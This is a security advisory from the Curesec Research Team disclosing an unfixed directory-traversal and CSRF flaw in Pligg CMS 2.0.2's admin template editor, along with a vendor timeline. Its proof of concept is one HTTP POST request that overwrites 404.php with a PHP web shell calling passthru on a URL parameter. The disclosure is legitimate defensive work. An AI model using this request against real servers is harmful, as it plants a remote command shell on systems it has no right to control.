Pligg CMS 2.0.2: Code Execution and CSRF

Pligg CMS 2.0.2: Code Execution and CSRF

Date: 2015-10-07 11:43:07
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website:
Vulnerability Type: Code Execution & CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Vulnerability Description

The file editor provides the possibility to edit .tpl files stored in the templates directory.

But the file editor is vulnerable to directory traversal when saving files, and it does not check the submitted filename against a whitelist of allowed files. It also does not check the file extension. Because of this, it is possible to gain code execution.

Admin credentials are required to access the file editor, but the request does not have CSRF protection, so an attacker can gain code execution by getting the admin to visit a website they control while logged in.

3. Proof of Concept

POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public